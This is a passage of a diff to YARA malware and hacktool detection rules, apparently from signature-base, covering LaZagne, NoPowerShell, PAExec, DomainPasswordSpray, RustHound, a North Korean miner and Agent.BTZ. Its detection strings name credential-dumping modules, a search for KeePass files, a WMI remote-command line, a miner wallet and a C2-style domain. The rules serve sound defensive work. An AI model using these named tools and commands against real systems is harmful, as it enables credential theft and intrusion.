+		hash3 = "bf8f30031769aa880cdbe22bc0be32691d9f7913af75a5b68f8426d4f0c7be50"
 
 	strings:
-		$typelibguid0lo = "8435531d-675c-4270-85bf-60db7653bcf6" ascii wide
-		$typelibguid1lo = "47db989f-7e33-4e6b-a4a5-c392b429264b" ascii wide
-		$typelibguid2lo = "300c7489-a05f-4035-8826-261fa449dd96" ascii wide
-		$typelibguid3lo = "41bf8781-ae04-4d80-b38d-707584bf796b" ascii wide
-		$typelibguid4lo = "620ed459-18de-4359-bfb0-6d0c4841b6f6" ascii wide
-		$typelibguid5lo = "91e7cdfe-0945-45a7-9eaa-0933afe381f2" ascii wide
-		$typelibguid6lo = "c28e121a-60ca-4c21-af4b-93eb237b882f" ascii wide
-		$typelibguid7lo = "698fac7a-bff1-4c24-b2c3-173a6aae15bf" ascii wide
-		$typelibguid8lo = "63a40d94-5318-42ad-a573-e3a1c1284c57" ascii wide
-		$typelibguid9lo = "56b8311b-04b8-4e57-bb58-d62adc0d2e68" ascii wide
+		$s1 = "softwares.opera(" ascii
+		$s2 = "softwares.mozilla(" ascii
+		$s3 = "config.dico(" ascii
+		$s4 = "softwares.chrome(" ascii
+		$s5 = "softwares.outlook(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 17000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dreamprotectorfree : FILE
+rule SIGNATURE_BASE_HKTL_Lazagne_Gen_18
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9ebee989-3441-5a76-b243-08de978b541c"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Paskowsky/DreamProtectorFree"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L821-L834"
+		description = "Detects Lazagne password extractor hacktool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "034ea6d8-f5cf-5664-9ff9-24d19403093d"
+		date = "2018-12-11"
+		modified = "2025-12-18"
+		reference = "https://creativecommons.org/licenses/by-nc/4.0/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4560-L4577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bd8a6373695b9ab69fdf9e7f4a65c2db4e7a5f6f04f6d308ec352322a396aa44"
-		score = 75
+		logic_hash = "6f3e895080267a551a3b7a0ba2d4207b31befacbd35d1e6941e1b69d7e2689ce"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "51121dd5fbdfe8db7d3a5311e3e9c904d644ff7221b60284c03347938577eecf"
 
 	strings:
-		$typelibguid0lo = "f7e8a902-2378-426a-bfa5-6b14c4b40aa3" ascii wide
+		$x1 = "lazagne.config.powershell_execute(" ascii
+		$x2 = "creddump7.win32." ascii
+		$x3 = "lazagne.softwares.windows.hashdump" ascii
+		$x4 = ".softwares.memory.libkeepass.common(" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Redsharp : FILE
+rule SIGNATURE_BASE_HKTL_Nopowershell
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2aa62d61-075c-5664-a7fc-2b9d84b954ed"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/padovah4ck/RedSharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L836-L849"
+		description = "Detects NoPowerShell hack tool"
+		author = "Florian Roth (Nextron Systems)"
+		id = "17d508d5-833f-5232-a071-dbed8758493b"
+		date = "2018-12-28"
+		modified = "2022-12-21"
+		reference = "https://github.com/bitsadmin/nopowershell"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4579-L4596"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b751bedba84e8fc253686a7acd33e46a96140f2903f99ce1df6b4932d475bf30"
+		logic_hash = "2207af9fcc61d547dfeff347a1eae2c59024a7270d1b8cbb7abef56d80864728"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "2dad091dd00625762a7590ce16c3492cbaeb756ad0e31352a42751deb7cf9e70"
 
 	strings:
-		$typelibguid0lo = "30b2e0cf-34dd-4614-a5ca-6578fb684aea" ascii wide
+		$x1 = "\\NoPowerShell.pdb" ascii
+		$x2 = "Invoke-WmiMethod -Class Win32_Process -Name Create \"cmd" fullword wide
+		$x3 = "ls C:\\Windows\\System32 -Include *.exe | select -First 10 Name,Length" fullword wide
+		$x4 = "ls -Recurse -Force C:\\Users\\ -Include *.kdbx" fullword wide
+		$x5 = "NoPowerShell.exe" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_ESC : FILE
+rule SIGNATURE_BASE_HKTL_Htran_Go : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "a57c47e8-62bf-5425-9735-35a3e3a0c218"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NetSPI/ESC"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L851-L865"
+		description = "Detects go based htran variant"
+		author = "Jeff Beley"
+		id = "bd9409e3-3d4c-57d6-af60-b6d6bd93d46b"
+		date = "2019-01-09"
+		modified = "2025-12-18"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4598-L4611"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0a8244145b25260912c8b1d2968fe33fb8497762a6d8f2bbb88a734346990d55"
+		logic_hash = "444fe8ce2fdb67c982de26a10882d2cfebc4d2de6c4b4ba6ee10cf39130f1cc5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4acbefb9f7907c52438ebb3070888ddc8cddfe9e3849c9d0196173a422b9035f"
 
 	strings:
-		$typelibguid0lo = "06260ce5-61f4-4b81-ad83-7d01c3b37921" ascii wide
-		$typelibguid1lo = "87fc7ede-4dae-4f00-ac77-9c40803e8248" ascii wide
+		$s1 = "https://github.com/cw1997/NATBypass" fullword ascii
+		$s2 = "-slave ip1:port1 ip2:port2" fullword ascii
+		$s3 = "-tran port1 ip:port2" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Csharp_Loader : FILE
+rule SIGNATURE_BASE_SUSP_Katz_PDB : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bf0c3d93-cbea-54c7-b950-fd4e5a600d07"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Csharp-Loader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L867-L880"
+		description = "Detects suspicious PDB in file"
+		author = "Florian Roth (Nextron Systems)"
+		id = "79f4f07c-b234-5203-a2ab-aba4a9cb9f8d"
+		date = "2019-02-04"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4613-L4626"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa1a176ce3dbf6ae43d921822d2ab1689a4bf74077fa2a9aa72534ab3cfa3ecc"
-		score = 75
+		logic_hash = "1a38f63d8e8baa9bc8f34c1886fc2aaea7f61d5e09792ba9cde4cf6ed8441fab"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6888ce8116c721e7b2fc3d7d594666784cf38a942808f35e309a48e536d8e305"
 
 	strings:
-		$typelibguid0lo = "5fd7f9fc-0618-4dde-a6a0-9faefe96c8a1" ascii wide
+		$s1 = /\\Release\\[a-z]{0,8}katz.pdb/
+		$s2 = /\\Debug\\[a-z]{0,8}katz.pdb/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 6000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Bantam : FILE
+rule SIGNATURE_BASE_HKTL_LNX_Pnscan : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0ed3f5e5-d954-51e2-b7fb-4c25ca3d9f10"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/gellin/bantam"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L882-L895"
+		description = "Detects Pnscan port scanner"
+		author = "Florian Roth (Nextron Systems)"
+		id = "46c6c0d9-08bb-5de3-ad14-c1a7ab0542c6"
+		date = "2019-05-27"
+		modified = "2025-12-18"
+		reference = "https://github.com/ptrrkssn/pnscan"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4628-L4641"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2dce37cd31fa359658519bd50fbb335fc6fd82af5e78a4d86d173d3628e0951f"
-		score = 75
+		logic_hash = "46a064f9df9d0a0f3fad4ec7be70b1e42074e5e117f7403d8239bc725590f268"
+		score = 55
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "14c79bda-2ce6-424d-bd49-4f8d68630b7b" ascii wide
+		$x1 = "-R<hex list>   Hex coded response string to look for." fullword ascii
+		$x2 = "This program implements a multithreaded TCP port scanner." ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharptask : FILE
+rule SIGNATURE_BASE_Paexec : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2cdd1a15-c70c-5eea-b5a7-8b4a445b9323"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/jnqpblc/SharpTask"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L897-L910"
+		description = "Detects remote access tool PAEXec (like PsExec) - file PAExec.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ee564534-b921-5639-a7ed-5da79d6bf86a"
+		date = "2017-03-27"
+		modified = "2025-12-18"
+		reference = "http://researchcenter.paloaltonetworks.com/2017/03/unit42-shamoon-2-delivering-disttrack/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4643-L4663"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c3f4ddf4ea9389e01611880a47f2a199938e9a5e0f05df4e7f772f7a9acedc61"
-		score = 75
+		logic_hash = "30478d90756a9ea362c40236518fe9013e5e5683641b7e7e1ad33aa3b5587e04"
+		score = 40
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc"
 
 	strings:
-		$typelibguid0lo = "13e90a4d-bf7a-4d5a-9979-8b113e3166be" ascii wide
+		$x1 = "Ex: -rlo C:\\Temp\\PAExec.log" fullword ascii
+		$x2 = "Can't enumProcesses - Failed to get token for Local System." fullword wide
+		$x3 = "PAExec %s - Execute Programs Remotely" fullword wide
+		$x4 = "\\\\%s\\pipe\\PAExecIn%s%u" fullword wide
+		$x5 = "\\\\.\\pipe\\PAExecIn%s%u" fullword wide
+		$x6 = "%%SystemRoot%%\\%s.exe" fullword wide
+		$x7 = "in replacement for PsExec, so the command-line usage is identical, with " fullword ascii
+		$x8 = "\\\\%s\\ADMIN$\\PAExec_Move%u.dat" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsplague : FILE
+rule SIGNATURE_BASE_HKTL_Domainpasswordspray : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "89729c43-ae01-5c1f-af04-06d7a6c4e7fc"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/RITRedteam/WindowsPlague"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L912-L925"
+		description = "Detects the Powershell password spray tool DomainPasswordSpray"
+		author = "Arnim Rupp"
+		id = "890e4514-2846-54f8-8f32-cc9d2a4ef81b"
+		date = "2023-01-13"
+		modified = "2025-12-18"
+		reference = "https://github.com/dafthack/DomainPasswordSpray"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4665-L4680"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "01ad0621f2bb129fd963093b65cd054bc2a2e185f21041c779b02b1e63475a1c"
-		score = 75
+		logic_hash = "aa20bf139eff36100624771fe7617c214337ae5ab2e2746143bd8e6cc1b05b4e"
+		score = 60
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "44d4c0ae5673d2a076f3b5acdc83063aca49d58e6dd7cf73d0b927f83d359247"
 
 	strings:
-		$typelibguid0lo = "cdf8b024-70c9-413a-ade3-846a43845e99" ascii wide
+		$s = "Invoke-DomainPasswordSpray" fullword ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 100KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Misc_Csharp : FILE
+rule SIGNATURE_BASE_HKTL_Rusthound : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
+		description = "Detect hacktool RustHound (Sharphound clone)"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d25fa706-2254-5a82-a961-f57a0daa447c"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/jnqpblc/Misc-CSharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L927-L941"
+		id = "d2fd79a5-9a1a-51de-920c-61653c8b0064"
+		date = "2023-03-30"
+		modified = "2025-12-18"
+		reference = "https://github.com/OPENCYBER-FR/RustHound"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L4682-L4709"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "32893d4396842c3df3756d7090a1e86bf73c5ad2476aab5d6c53db8bdae9c31a"
+		hash = "409f61a34d9771643246f401a9670f6f7dcced9df50cbd89a2e1a5c9ba8d03ab"
+		hash = "b1a58a9c94b1df97a243e6c3fc2d04ffd92bc802edc7d8e738573b394be331a9"
+		hash = "170f4a48911f3ebef674aade05184ea0a6b1f6b089bcffd658e95b9905423365"
+		hash = "e52f6496b863b08296bf602e92a090768e86abf498183aa5b6531a3a2d9c0bdb"
+		hash = "847e57a35df29d40858c248e5b278b09cfa89dd4201cb24262c6158395e2e585"
+		hash = "4edfed92b54d32a58b2cfc926f98a56637e89850410706abcc469a8bc846bc85"
+		hash = "feba0c16830ea0a13819a9ab8a221cc64d5a9b3cc73f3c66c405a171a2069cc1"
+		hash = "21d37c2393a6f748fe34c9d2f52693cb081b63c3a02ca0bebe4a584076f5886c"
+		hash = "874a1a186eb5808d456ce86295cd5f09d6c819375acb100573c2103608af0d84"
+		hash = "bf576bd229393010b2bb4ba17e49604109e294ca38cf19647fc7d9c325f7bcd1"
+		logic_hash = "386b734ad7f3cf02f096236c941033b3f905a3368b8a72dd63e91e6e94f12f8d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "d1421ba3-c60b-42a0-98f9-92ba4e653f3d" ascii wide
-		$typelibguid1lo = "2afac0dd-f46f-4f95-8a93-dc17b4f9a3a1" ascii wide
+		$rh1 = "rusthound" fullword ascii wide
+		$rh2 = "Making json/zip files finished!" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D or uint16( 0 ) == 0x457f ) and 1 of ( $rh* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpspray : FILE
+rule SIGNATURE_BASE_NK_Miner_Malware_Jan18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e9312c96-be10-5942-a4da-1fe708cc6699"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/jnqpblc/SharpSpray"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L943-L956"
+		description = "Detects Noth Korean Monero Miner mentioned in AlienVault report"
+		author = "Florian Roth (Nextron Systems) (original rule by Chris Doman)"
+		id = "40f53c36-9e14-5307-9740-e6f514afc7ec"
+		date = "2018-01-09"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/PChE1z"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_nkminer.yar#L11-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "15ad567589656894f0da6ee56c26f48868936db015d0b41c04ccd6fd56f5753e"
+		logic_hash = "eb75fe7d70b547a4774b74c01e11479949dfccb8645af330f87b51daaf0d8dbf"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0024e32c0199ded445c0b968601f21cc92fc0c534d2642f2dd64c1c978ff01f3"
+		hash2 = "42300b6a09f183ae167d7a11d9c6df21d022a5f02df346350d3d875d557d3b76"
 
 	strings:
-		$typelibguid0lo = "51c6e016-1428-441d-82e9-bb0eb599bbc8" ascii wide
+		$x0 = "c:\\users\\jawhar\\documents\\" ascii
+		$x1 = "C:\\Users\\Jawhar\\documents\\" ascii
+		$x2 = "The number of processors on this computer is {0}." fullword wide
+		$x3 = { 00 00 1F 43 00 3A 00 5C 00 4E 00 65 00 77 00 44
+              00 69 00 72 00 65 00 63 00 74 00 6F 00 72 00 79
+              00 00 }
+		$x4 = "Le fichier Hello txt n'existe pas" fullword wide
+		$x5 = "C:\\NewDirectory2\\info2" fullword wide
+		$a = "82e999fb-a6e0-4094-aa1f-1a306069d1a5" ascii
+		$b = "4JUdGzvrMFDWrUUwY3toJATSeNwjn54LkCnKBPRzDuhzi5vSepHfUckJNxRL2gjkNrSqtCoRUrEDAgRwsQvVCjZbRy5YeFCqgoUMnzumvS" ascii
+		$c = "barjuok.ryongnamsan.edu.kp" wide ascii
+		$d = "C:\\SoftwaresInstall\\soft" wide ascii
+		$e = "C:\\Windows\\Sys64\\intelservice.exe" wide ascii
+		$f = "C:\\Windows\\Sys64\\updater.exe" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 30KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Obfuscator : FILE
+
+rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d9988b00-1f10-5421-8ffe-49849a5d5902"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/3xpl01tc0d3r/Obfuscator"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L958-L971"
+		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f8032616-2a54-5107-b330-65fcc84b866e"
+		date = "2017-08-07"
+		modified = "2023-12-05"
+		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L13-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "523ce9e83bd6cd7152d86fe77a441a3f721d79f8df45c4041e47cae4b15673d5"
+		logic_hash = "ea430b2888b487a5c7a91b73e8a7893b53d67e8ac95ae85fe9d15c633b2ee660"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9c163c3f2bd5c5181147c6f4cf2571160197de98f496d16b38c7dc46b5dc1426"
+		hash2 = "628d316a983383ed716e3f827720915683a8876b54677878a7d2db376d117a24"
 
 	strings:
-		$typelibguid0lo = "8fe5b811-a2cb-417f-af93-6a3cf6650af1" ascii wide
+		$s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Modules" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them and pe.exports ( "Entry" ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Safetykatz : FILE
+
+rule SIGNATURE_BASE_Agent_BTZ_Proxy_DLL_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5f6d7432-0bb5-5782-98ec-2c2168f2fc1f"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/GhostPack/SafetyKatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L973-L986"
+		description = "Detects Agent-BTZ Proxy DLL - activeds.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "2777443d-6f63-5948-855a-e064a6e0310f"
+		date = "2017-08-07"
+		modified = "2023-12-05"
+		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L29-L52"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "08b1e8ee951140dc6ac07f2646e0bf84bb22bea9948d231e1ba8d4cf0a28a2e8"
+		logic_hash = "41960e6deaee5d087b0eeee515b323cef8ead45ad305d053f6eb1897e204b003"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "73db4295c5b29958c5d93c20be9482c1efffc89fc4e5c8ba59ac9425a4657a88"
+		hash2 = "380b0353ba8cd33da8c5e5b95e3e032e83193019e73c71875b58ec1ed389bdac"
+		hash3 = "f27e9bba6a2635731845b4334b807c0e4f57d3b790cecdc77d8fef50629f51a2"
 
 	strings:
-		$typelibguid0lo = "8347e81b-89fc-42a9-b22c-f59a6a572dec" ascii wide
+		$s1 = { 38 21 38 2C 38 37 38 42 38 4D 38 58 38 63 38 6E
+               38 79 38 84 38 8F 38 9A 38 A5 38 B0 38 BB 38 C6
+               38 D1 38 DC 38 E7 38 F2 38 FD 38 08 39 13 39 1E
+               39 29 39 34 39 3F 39 4A 39 55 39 60 39 6B 39 76
+               39 81 39 8C 39 97 39 A2 39 AD 39 B8 39 C3 39 CE
+               39 D9 39 E4 39 EF 39 FA 39 05 3A 10 3A 1B 3A 26
+               3A 31 3A 3C 3A 47 3A 52 3A 5D 3A 68 3A 73 3A 7E
+               3A 89 3A 94 3A 9F 3A AA 3A B5 3A C0 3A CB 3A D6
+               3A E1 3A EC 3A F7 3A }
+		$s2 = "activeds.dll" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them and pe.imphash ( ) == "09b7c73fbe5529e6de7137e3e8268b7b"
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Dropless_Malware : FILE
+
+rule SIGNATURE_BASE_Agent_BTZ_Aug17 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0da3b6d8-2002-590e-a8d5-f6c84acfb083"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Dropless-Malware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L988-L1001"
+		description = "Detects Agent.BTZ"
+		author = "Florian Roth (Nextron Systems)"
+		id = "31804208-3edb-554b-8820-e682db647435"
+		date = "2017-08-07"
+		modified = "2023-12-05"
+		reference = "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_agent_btz.yar#L54-L73"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "833b7758aea58d3065c2c3153f0ab21b7b6a54f7e7083655f2a52c2861080f7d"
+		logic_hash = "cf4fc7820d516cf0322bf25460301b4d04f914814fc2a069164814dd4e1158be"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6ad78f069c3619d0d18eef8281219679f538cfe0c1b6d40b244beb359762cf96"
+		hash2 = "49c5c798689d4a54e5b7099b647b0596fb96b996a437bb8241b5dd76e974c24e"
+		hash3 = "e88970fa4892150441c1616028982fe63c875f149cd490c3c910a1c091d3ad49"
 
 	strings:
-		$typelibguid0lo = "23b739f7-2355-491e-a7cd-a8485d39d6d6" ascii wide
+		$s1 = "stdole2.tlb" fullword ascii
+		$s2 = "UnInstallW" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and all of them and pe.exports ( "Entry" ) and pe.exports ( "InstallW" ) and pe.exports ( "UnInstallW" ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_UAC_Silentclean : FILE
+
